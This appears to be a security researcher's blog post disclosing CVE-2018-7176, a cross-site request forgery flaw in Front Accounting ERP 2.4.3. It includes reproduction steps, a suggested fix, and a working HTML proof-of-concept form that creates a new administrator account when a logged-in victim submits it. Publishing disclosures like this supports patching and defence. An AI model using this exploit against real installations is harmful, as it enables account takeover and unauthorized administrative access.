Friday, 16 February 2018

Cross Site Request Forgery- Front Accounting ERP 2.4.3 - CVE-2018-7176

Cross Site Request Forgery- Front Accounting ERP 2.4.3


By- Samrat Das

Hi Readers,

Recently while performing some open source security assessment, I came across an ERP Application- Front Accounting . Curious to explore its functionalities, I set up a local copy and started playing around to find security vulnerabilities’. 

Title of the Vulnerability:  Cross Site Request Forgery.
Vulnerability Class: Remote Code Execution/ Account takeover
Technical Details & Description: The application source code is coded in a way which allows malicious crafted HTML page to be executed directly without any anti csrf countermeasures.
CVE ID allocated:  CVE-2018-7176
Product & Service Introduction: Front Accounting 2.4.3
Steps to Re-Produce –
1.       Visit the application
2.       Visit the User Permissions Page.
3.        Goto add user, and create a csrf crafted exploit for the same , upon hosting it on a server and sending the link to click by victim, it gets exploited.
Exploitation Technique: A attacker can perform application modification to complete account takeover.
Severity Level: Critical
Security Risk:
The presence of such a risk can lead to user data compromise as well as account takeover

Exploit code:
<html>
 <body>
    <form action="http://localhost/frontaccounting/admin/users.php?JsHttpRequest=0-xml" method="POST" enctype="text/plain">
      <input type="hidden" name="show&#95;inactive" value="&amp;user&#95;id&#61;Newadmin&amp;password&#61;Newadmin&amp;real&#95;name&#61;New&#37;20Admin&amp;phone&#61;&amp;email&#61;&amp;role&#95;id&#61;8&amp;language&#61;C&amp;pos&#61;1&amp;print&#95;profile&#61;&amp;rep&#95;popup&#61;1&amp;ADD&#95;ITEM&#61;Add&#37;20new&amp;&#95;focus&#61;user&#95;id&amp;&#95;modified&#61;0&amp;&#95;confirmed&#61;&amp;&#95;token&#61;Ta6aiT2xqlL2vg8u9aAvagxx&amp;&#95;random&#61;757897&#46;6552143205" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affected Product Version: 2.4.3

Solution - Fix & Patch: The application code should be configured with an anti csrf token to mitigate the issue of Cross Site request forgery.





1 comment:

  1. nice post.I am impressed by the quality of information on this website.Thanks for sharing this post
    Automotive-MobileApp-software-Chennai-India

    ReplyDelete

Hacking into Block Chain Technology:Part 2

Security Testing on Block Chain: By- Samrat Das Now since we have our fundamentals clear on block chain, let’s proceed for un...